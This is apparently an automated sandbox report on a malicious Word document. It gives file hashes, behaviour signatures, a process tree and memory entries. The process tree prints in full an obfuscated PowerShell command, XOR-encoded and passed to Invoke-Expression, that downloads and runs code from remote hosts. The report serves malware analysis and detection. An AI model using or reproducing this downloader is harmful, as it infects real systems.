Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    29/08/2024, 05:38

General

  • Target

    c84def5c375569b443780a693a3d7dbe_JaffaCakes118.doc

  • Size

    100KB

  • MD5

    c84def5c375569b443780a693a3d7dbe

  • SHA1

    ec806430c0a78d5e1af41bc98b828274eae5af0e

  • SHA256

    c2c6c63271228e95c0c401bd7efd45781970c4001507271ff6ef61bcefa9176b

  • SHA512

    8ff35f5ec0907c30af48a719dd6ddf482403ab3f5341fe83f6d56a65fa51e939eb4b944936e75321fced139a398f4c1c013f48020d217aecf4b069b5a568054e

  • SSDEEP

    1536:yPYdANgW0zHZNC+agKLtevdLkjBSAImAu8qqFtjdz15sA:w0ANtsvsUv+BSAImKtj11uA

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c84def5c375569b443780a693a3d7dbe_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2688
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHeLL.exe
        PowersHeLL [STrINg]::JOIn('',([Char[]] (112,21 , 56,21 ,38 ,23 , 13 ,116, 105,116 ,58,49, 35,121,59 , 54,62 ,49 ,55 , 32 , 116,38,53,58, 48 ,59 ,57 , 111, 112 , 14 , 56,63 ,37,57 ,29 ,116, 105,116 , 58 ,49 ,35 , 121 ,59, 54 ,62, 49 ,55 , 32 ,116 ,7 , 45 , 39 , 32 , 49 ,57 ,122, 26, 49 , 32 , 122 ,3 ,49, 54,23 ,56,61,49 ,58 ,32 , 111 ,112 , 23, 28,27, 61,39, 116, 105, 116,115 ,60 ,32, 32, 36, 110, 123,123 ,39 , 55, 60 , 59,59,58 , 60,49, 61 ,48,39 , 39, 53,56, 59 , 58,121 ,39 ,33, 38,38, 49 , 58 , 48 , 49,38 ,122,58, 56 ,123 , 60,60, 22 , 37 ,44 , 98 , 123 , 20 ,60,32 ,32, 36, 110 , 123 ,123 ,34,53 , 48 , 59, 58, 63,53 , 122 ,55 ,59, 57 ,123, 61,0,31 ,7,123,20, 60, 32 ,32 ,36 ,110 , 123 , 123,35 ,35,35 ,122, 53 , 58 ,48,38, 49 , 45,54 , 59 ,48,38,59 , 34 ,122 , 38,33 , 123, 53 ,22, 102,53,31 ,123, 20 , 60,32 ,32,36, 110 ,123 , 123, 35,35,35 ,122, 48 , 59 , 51, 53, 58,53 ,45,61 ,39 , 57 ,53, 63 ,45 , 49 ,48, 49 , 63,36 , 53,38 , 55 ,53 ,122 , 55 ,59 , 57, 123,39 ,39, 6 , 62, 60 ,123 , 20 ,60,32 ,32 , 36 ,110, 123,123, 35 ,35,35 , 122 , 63 , 49, 58 , 55,53,58 , 53 ,57,33, 56, 61 ,53 , 122 , 55 , 59 ,57,123,26 ,54,53 , 36 ,16, 123 , 115 ,122, 7, 36 ,56,61 , 32, 124, 115, 20 ,115, 125, 111, 112,57 , 62 ,61,6, 22,116 , 105, 116 , 112,21 ,56 ,21 , 38 ,23, 13, 122 , 58 , 49,44, 32 , 124 , 101, 120,116 , 102, 109,97,99 , 108,98, 125,111,112, 48 ,16 ,36,5,21 , 13 , 116 ,105 , 116,112 ,49 ,58,34 ,110, 32,49 , 57 , 36 , 116,127 ,116 , 115, 8 ,115,116 , 127,116 ,112 ,57 ,62,61, 6, 22 , 116 ,127, 116 ,115 ,122,49,44 ,49 , 115 , 111,50 , 59, 38, 49 ,53, 55, 60 , 124, 112,6,50 , 61, 18,12 , 24, 116 ,61,58 , 116, 112 ,23 ,28 ,27 , 61, 39 ,125 , 47, 32,38 ,45 , 47 ,112 , 14 ,56 , 63 ,37 , 57 ,29 , 122 , 16,59 , 35,58 ,56 , 59,53 , 48 ,18, 61 , 56,49 , 124 , 112 , 6 ,50, 61 , 18,12 , 24, 122 ,0,59, 7,32 ,38, 61,58 , 51 , 124 ,125, 120 , 116,112, 48,16, 36 , 5, 21,13, 125 ,111,7 ,32 , 53 , 38 , 32,121, 4, 38 , 59, 55 , 49 ,39 , 39,116,112 , 48, 16,36, 5, 21,13,111, 54, 38,49 ,53, 63 , 111 ,41 ,55,53 , 32 , 55 ,60,47 , 35 , 38 , 61 , 32, 49, 121 ,60, 59 ,39 , 32 ,116 ,112,11, 122 ,17 ,44, 55, 49 , 36 , 32 , 61, 59 , 58 ,122 ,25 ,49, 39,39 , 53, 51, 49 ,111,41 ,41 ) | FOreacH { [Char]($_-BxOr "0x54") }) )| .((VaRIAbLE '*mdr*').NaME[3,11,2]-Join'')
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2632

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            19KB

            MD5

            5b48a52e096b78a7922c3ac098410329

            SHA1

            5f677e63455dcf759220afe4d59004c7d5dcfca4

            SHA256

            bec1ba6d990179f47e90c75f646dd1a08128d39157667518cc02a871d0679750

            SHA512

            ccf7a86164b63bf93f0766287bc49faed6a26bd0e8e2ec21a42ad565fcefba0208925e713aa542a38f55af827692982a6e2ce8b076cf65417618ae31d586c383

          • memory/2916-12-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-0-0x000000002F8F1000-0x000000002F8F2000-memory.dmp

            Filesize

            4KB

          • memory/2916-55-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-13-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-58-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-60-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-59-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-56-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-47-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-43-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-34-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-28-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-22-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-20-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-16-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-15-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-2-0x000000007170D000-0x0000000071718000-memory.dmp

            Filesize

            44KB

          • memory/2916-14-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-11-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-10-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-9-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-8-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-7-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-53-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-21-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-4-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-54-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-6-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-5-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-68-0x000000007170D000-0x0000000071718000-memory.dmp

            Filesize

            44KB

          • memory/2916-69-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-70-0x0000000000450000-0x0000000000550000-memory.dmp

            Filesize

            1024KB

          • memory/2916-85-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2916-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2916-86-0x000000007170D000-0x0000000071718000-memory.dmp

            Filesize

            44KB